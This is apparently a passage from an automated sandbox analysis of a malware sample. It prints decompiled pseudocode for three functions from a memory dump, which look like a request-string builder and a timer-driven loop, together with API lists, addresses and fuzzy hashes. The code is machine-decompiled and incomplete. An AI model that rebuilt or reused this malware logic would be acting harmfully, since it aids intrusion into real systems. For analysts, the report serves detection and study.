                                • Instruction Fuzzy Hash: E42105B2910218BBDF01AF95CC85DDEBFBDFF08750F1040A6F904A6250D7719E409BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041946D1, Relevance: 21.3, APIs: 14, Instructions: 262memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 51%
                                			E041946D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				void* _t138;
				intOrPtr _t139;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				intOrPtr* _t166;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x419a018; // 0x0
				asm("bswap eax");
				_t65 =  *0x419a014; // 0x0
				_t166 =  *0x419a134; // 0x4197909
				asm("bswap eax");
				_t66 =  *0x419a010; // 0x0
				asm("bswap eax");
				_t67 =  *0x419a00c; // 0x0
				asm("bswap eax");
				_t68 =  *0x419a2d4; // 0x0
				_t3 = _t68 + 0x419b613; // 0x51082418
				_t157 =  *_t166(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x419a02c,  *0x419a004, _t63);
				_t72 =  *0x419a2d4; // 0x0
				_t4 = _t72 + 0x419b653; // 0x98a9fe19
				_t75 =  *_t166(_t157 + _t143, _t4, E04196A09());
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x419a2d4; // 0x0
					_t8 = _t139 + 0x419b65e; // 0x35265981
					_t142 =  *_t166(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E04195040(_t144);
				_t77 =  *0x419a2d4; // 0x0
				_t10 = _t77 + 0x419b302; // 0x4ad9ece2
				_t159 = _t158 +  *_t166(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x419a2d4; // 0x0
				_t12 = _t81 + 0x419b7aa; // 0x419b7aa
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x419b2d7; // 0xefd2fcd4
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 +  *_t166(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x419a31c; // 0x0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x419a2d4; // 0x0
					_t18 = _t135 + 0x419b8da; // 0x82681b86
					_t138 =  *_t166(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x419a32c; // 0x0
				if(_t86 != 0) {
					_t132 =  *0x419a2d4; // 0x0
					_t20 = _t132 + 0x419b676; // 0x26271f16
					 *_t166(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x419a37c; // 0x0
				_t88 = E04192885(0x419a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x419a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x419a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x419a290, _t167, _v12);
						goto L28;
					}
					E04192DD0(GetTickCount());
					_t95 =  *0x419a37c; // 0x0
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x419a37c; // 0x0
					__imp__(_t99 + 0x40);
					_t101 =  *0x419a37c; // 0x0
					_t163 = E0419624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x419a290, _t167, _a8);
						goto L27;
					}
					 *0x419a10c(_t163, 0x41992ac);
					_push(_t163);
					_t107 = E041921C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x419a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E04194AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E04191492();
						L24:
						HeapFree( *0x419a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E041926C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0419161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E041950CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0419580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E041950CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                0x041946d1
                                0x041946d1
                                0x041946d1
                                0x041946da
                                0x041946df
                                0x041946e6
                                0x041946e8
                                0x041946e8
                                0x041946f5
                                0x04194700
                                0x04194703
                                0x04194708
                                0x0419470e
                                0x04194711
                                0x04194716
                                0x04194719
                                0x0419471e
                                0x04194721
                                0x0419472d
                                0x0419473a
                                0x04194742
                                0x04194747
                                0x04194752
                                0x04194754
                                0x04194757
                                0x0419475d
                                0x0419475f
                                0x04194767
                                0x04194772
                                0x04194774
                                0x04194777
                                0x04194777
                                0x04194779
                                0x04194780
                                0x04194785
                                0x04194792
                                0x04194794
                                0x04194799
                                0x041947a1
                                0x041947a4
                                0x041947aa
                                0x041947b5
                                0x041947b7
                                0x041947bc
                                0x041947c1
                                0x041947c4
                                0x041947c9
                                0x041947d4
                                0x041947d6
                                0x041947d9
                                0x041947d9
                                0x041947db
                                0x041947e2
                                0x041947e5
                                0x041947ea
                                0x041947f4
                                0x041947f6
                                0x041947f6
                                0x041947f9
                                0x04194807
                                0x0419480c
                                0x04194810
                                0x04194813
                                0x041949dd
                                0x041949e5
                                0x041949f2
                                0x04194819
                                0x04194825
                                0x0419482d
                                0x04194830
                                0x041949cd
                                0x041949d7
                                0x00000000
                                0x041949d7
                                0x0419483c
                                0x04194841
                                0x0419484a
                                0x0419485b
                                0x0419485f
                                0x04194868
                                0x0419486e
                                0x0419487b
                                0x04194882
                                0x0419488b
                                0x04194891
                                0x041949bd
                                0x041949c7
                                0x00000000
                                0x041949c7
                                0x0419489d
                                0x041948a3
                                0x041948a4
                                0x041948ab
                                0x041948ae
                                0x041949af
                                0x041949b7
                                0x00000000
                                0x041949b7
                                0x041948b7
                                0x041948bd
                                0x041948c6
                                0x041948cf
                                0x041948da
                                0x041948e1
                                0x041948e4
                                0x041949f5
                                0x04194997
                                0x04194997
                                0x0419499c
                                0x041949a7
                                0x041949ad
                                0x00000000
                                0x041949ad
                                0x041948ee
                                0x041948f5
                                0x041948f8
                                0x041948fd
                                0x0419490d
                                0x04194910
                                0x04194916
                                0x0419491c
                                0x04194922
                                0x04194925
                                0x0419492b
                                0x0419492e
                                0x04194933
                                0x04194937
                                0x04194937
                                0x04194943
                                0x0419494f
                                0x04194953
                                0x04194955
                                0x0419495a
                                0x0419495c
                                0x04194961
                                0x04194966
                                0x04194973
                                0x0419497b
                                0x0419497e
                                0x0419497e
                                0x0419495a
                                0x00000000
                                0x04194945
                                0x04194949
                                0x04194980
                                0x04194983
                                0x0419498c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0419498c
                                0x0419494b
                                0x00000000
                                0x0419494b
                                0x04194943

                                APIs
                                • GetTickCount.KERNEL32 ref: 041946E8
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04194825
                                • GetTickCount.KERNEL32 ref: 04194836
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 0419484A
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04194868
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 0419624D: strcpy.NTDLL ref: 04196297
                                  • Part of subcall function 0419624D: lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 041948BD
                                • lstrcat.KERNEL32(00000000,?), ref: 041948CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 041948D5
                                  • Part of subcall function 04194AA6: lstrlen.KERNEL32(?,00000000,00000000,04197909,041913D0,?,041955DE,041955DE,?,041955DE,?,00000000,E8FA7DD7,00000000), ref: 04194AAD
                                  • Part of subcall function 04194AA6: mbstowcs.NTDLL ref: 04194AD6
                                  • Part of subcall function 04194AA6: memset.NTDLL ref: 04194AE8
                                • wcstombs.NTDLL ref: 04194966
                                  • Part of subcall function 0419161A: SysAllocString.OLEAUT32(00000000), ref: 0419165B
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 041949A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 041949B7
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 041949C7
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 041921C1: lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                  • Part of subcall function 041921C1: lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                • HeapFree.KERNEL32(00000000,?), ref: 041949D7
                                • HeapFree.KERNEL32(00000000,?), ref: 041949E5
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcat$CountCriticalSectionTicklstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 3886839532-0
                                • Opcode ID: 59c8a799883a05faeaffe91ab72ba328ecb1110d73db6074c7017ed155fd6dc0
                                • Instruction ID: a3c07d145b006d3fa5a3bdd1bebe86f4903b91956d87b1a0ae049cdb8ca60b88
                                • Opcode Fuzzy Hash: 59c8a799883a05faeaffe91ab72ba328ecb1110d73db6074c7017ed155fd6dc0
                                • Instruction Fuzzy Hash: 14A158B1900149AFDF11DFAADC88E9A3BE9FF49394B144065F808C7250DB39ED95DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04196EFC, Relevance: 21.2, APIs: 14, Instructions: 220memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E04196EFC(long __eax, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v60;
				intOrPtr _v76;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				void* _t87;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				void* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x419a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x419a018; // 0x0
					asm("bswap eax");
					_t97 =  *0x419a134; // 0x4197909
					_t32 =  *0x419a014; // 0x0
					asm("bswap eax");
					_t33 =  *0x419a010; // 0x0
					asm("bswap eax");
					_t34 =  *0x419a00c; // 0x0
					asm("bswap eax");
					_t35 =  *0x419a2d4; // 0x0
					_t2 = _t35 + 0x419b613; // 0x51082418
					_t111 =  *_t97(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x419a02c,  *0x419a004, _t110);
					_t39 =  *0x419a2d4; // 0x0
					_t3 = _t39 + 0x419b653; // 0x98a9fe19
					_t42 =  *_t97(_t111 + _t117, _t3, E04196A09());
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_v4 != 0) {
						_t92 =  *0x419a2d4; // 0x0
						_t7 = _t92 + 0x419b65e; // 0x35265981
						_t95 =  *_t97(_t112 + _t117, _t7, _v4);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E04195040(_t99);
					_t44 =  *0x419a2d4; // 0x0
					_t9 = _t44 + 0x419b302; // 0x4ad9ece2
					_t113 = _t112 +  *_t97(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x419a2d4; // 0x0
					_t11 = _t48 + 0x419b2d7; // 0xefd2fcd4
					_t114 = _t113 +  *_t97(_t113 + _t117, _t11, 0);
					_t52 =  *0x419a32c; // 0x0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x419a2d4; // 0x0
						_t13 = _t88 + 0x419b676; // 0x26271f16
						_t91 =  *_t97(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x419a37c; // 0x0
					_v4 = E04192885(0x419a00a, _t105 + 4);
					_t55 =  *0x419a31c; // 0x0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x419a2d4; // 0x0
						_t16 = _t84 + 0x419b8da; // 0x82681b86
						_t87 =  *_t97(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x419a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x419a2d4; // 0x0
						_t18 = _t81 + 0x419b8b1; // 0x2aad0059
						 *_t97(_t114 + _t117, _t18, _t56);
					}
					if(_v4 != _t107) {
						_t98 = RtlAllocateHeap( *0x419a290, _t107, 0x800);
						if(_t98 != _t107) {
							E04192DD0(GetTickCount());
							_t62 =  *0x419a37c; // 0x0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x419a37c; // 0x0
							__imp__(_t66 + 0x40);
							_t68 =  *0x419a37c; // 0x0
							_t115 = E0419624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								 *0x419a10c(_t115, 0x41992ac);
								_push(_t115);
								_t108 = E041921C1();
								_v40 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _v28);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E04191032(0xffffffffffffffff, _t98, _v48, _v44);
									_v76 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E04191492();
									}
									HeapFree( *0x419a290, 0, _v60);
								}
								HeapFree( *0x419a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x419a290, _t107, _t98);
						}
						HeapFree( *0x419a290, _t107, _v12);
					}
					HeapFree( *0x419a290, _t107, _t117);
				}
				return _v16;
			}

























































                                0x04196efc
                                0x04196f10
                                0x04196f12
                                0x04196f20
                                0x04196f24
                                0x04196f2c
                                0x04196f34
                                0x04196f34
                                0x04196f36
                                0x04196f42
                                0x04196f4a
                                0x04196f51
                                0x04196f56
                                0x04196f59
                                0x04196f5e
                                0x04196f61
                                0x04196f66
                                0x04196f69
                                0x04196f75
                                0x04196f82
                                0x04196f8a
                                0x04196f8f
                                0x04196f9a
                                0x04196f9c
                                0x04196f9f
                                0x04196fa5
                                0x04196fa7
                                0x04196fb0
                                0x04196fbb
                                0x04196fbd
                                0x04196fc0
                                0x04196fc0
                                0x04196fc2
                                0x04196fc9
                                0x04196fce
                                0x04196fdb
                                0x04196fdd
                                0x04196fe2
                                0x04196ff0
                                0x04196ff2
                                0x04196ff7
                                0x04196ffc
                                0x04196fff
                                0x04197004
                                0x0419700f
                                0x04197011
                                0x04197014
                                0x04197014
                                0x04197016
                                0x04197029
                                0x0419702d
                                0x04197032
                                0x04197036
                                0x04197039
                                0x0419703e
                                0x04197049
                                0x0419704b
                                0x0419704e
                                0x0419704e
                                0x04197050
                                0x04197057
                                0x0419705a
                                0x0419705f
                                0x04197069
                                0x0419706b
                                0x04197072
                                0x0419708a
                                0x0419708e
                                0x0419709a
                                0x0419709f
                                0x041970a8
                                0x041970b9
                                0x041970bd
                                0x041970c6
                                0x041970cc
                                0x041970d9
                                0x041970e6
                                0x041970ec
                                0x041970f4
                                0x041970fa
                                0x04197100
                                0x04197104
                                0x04197108
                                0x0419710e
                                0x04197112
                                0x04197119
                                0x04197120
                                0x04197124
                                0x0419712f
                                0x04197136
                                0x0419713a
                                0x04197143
                                0x04197143
                                0x04197154
                                0x04197154
                                0x04197163
                                0x04197169
                                0x04197169
                                0x04197173
                                0x04197173
                                0x04197184
                                0x04197184
                                0x04197192
                                0x04197192
                                0x041971a2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04196F1A
                                • GetTickCount.KERNEL32 ref: 04196F2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04197084
                                • GetTickCount.KERNEL32 ref: 04197094
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041970A8
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 041970C6
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 0419624D: strcpy.NTDLL ref: 04196297
                                  • Part of subcall function 0419624D: lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 04197173
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 041921C1: lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                  • Part of subcall function 041921C1: lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04197112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04197120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04197124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04197154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04197163
                                • HeapFree.KERNEL32(00000000,?), ref: 04197184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04197192
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTicklstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 424325591-0
                                • Opcode ID: dbc0408f0b56f046d518583ed8989d2c2b83282ee2c9420ea99f8e16e3d79d5e
                                • Instruction ID: 42eb39c0cc0c08ccbb9edde26c2e3c47a40ae3f1420307177e8f3472165eb8c7
                                • Opcode Fuzzy Hash: dbc0408f0b56f046d518583ed8989d2c2b83282ee2c9420ea99f8e16e3d79d5e
                                • Instruction Fuzzy Hash: 1B717CB1500245AFD721DB6AED88E567BECFF88780B190515F959C3200EB3ABD899B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04192022, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E04192022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x419a298);
					_v20 = 0;
					_v16 = 0;
					L04197D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x419a2c4; // 0x350
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E04191AB8(_t74) != 0) {
							 *0x419a2a4 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x419a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E04195F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04193032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x419a29c);
							goto L21;
						} else {
							__eflags =  *0x419a2a0; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04191492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x419a2a0);
								L21:
								L04197D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x419a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}



























                                0x04192022
                                0x04192034
                                0x04192037
                                0x04192043
                                0x0419204b
                                0x0419204e
                                0x041921b4
                                0x04192054
                                0x04192054
                                0x04192056
                                0x0419205b
                                0x0419205c
                                0x04192062
                                0x04192065
                                0x04192068
                                0x04192076
                                0x04192081
                                0x04192084
                                0x04192086
                                0x04192093
                                0x0419209d
                                0x041920a1
                                0x041920a4
                                0x041920a9
                                0x041920b4
                                0x041920b4
                                0x041920be
                                0x00000000
                                0x041920c1
                                0x041920c5
                                0x041920d0
                                0x041920d0
                                0x041920d7
                                0x041920dc
                                0x041920e3
                                0x041920ec
                                0x041920f2
                                0x041920f5
                                0x041920fc
                                0x041920ff
                                0x00000000
                                0x00000000
                                0x04192101
                                0x04192104
                                0x04192107
                                0x0419210a
                                0x00000000
                                0x0419210c
                                0x0419211b
                                0x0419211b
                                0x00000000
                                0x04192149
                                0x04192149
                                0x0419214e
                                0x0419216d
                                0x0419216f
                                0x04192174
                                0x04192175
                                0x00000000
                                0x04192150
                                0x04192150
                                0x04192156
                                0x00000000
                                0x04192158
                                0x04192158
                                0x0419215d
                                0x0419215f
                                0x04192164
                                0x04192165
                                0x0419217b
                                0x0419217b
                                0x04192183
                                0x0419218e
                                0x04192191
                                0x0419219c
                                0x0419219e
                                0x041921a0
                                0x041921a3
                                0x00000000
                                0x041921a9
                                0x00000000
                                0x041921a9
                                0x041921a3
                                0x04192156
                                0x00000000
                                0x0419214e
                                0x0419211e
                                0x04192120
                                0x04192123
                                0x04192124
                                0x04192124
                                0x04192128
                                0x04192132
                                0x04192132
                                0x04192138
                                0x0419213b
                                0x0419213b
                                0x04192141
                                0x04192141
                                0x041921be
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 04192037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04192043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04192068
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04192084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0419209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04192132
                                • CloseHandle.KERNEL32(?), ref: 04192141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0419217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0419560C), ref: 04192191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0419219C
                                  • Part of subcall function 04191AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,281EC7EF,0419BD98,?,00000000,F8C925DB,00000014,2738C7B8,0419BD54), ref: 04191BA4
                                  • Part of subcall function 04191AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,041920B0), ref: 04191BB6
                                • GetLastError.KERNEL32 ref: 041921AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: b0a231fc5e8ef44f9b8a903dcc9308a04c28d019e34d4799fb6e7130c1a5cf65
                                • Instruction ID: 9830277ea9640eb11fac899e1b0e4fc050c8d80c40e6935d75a924839cb1978a
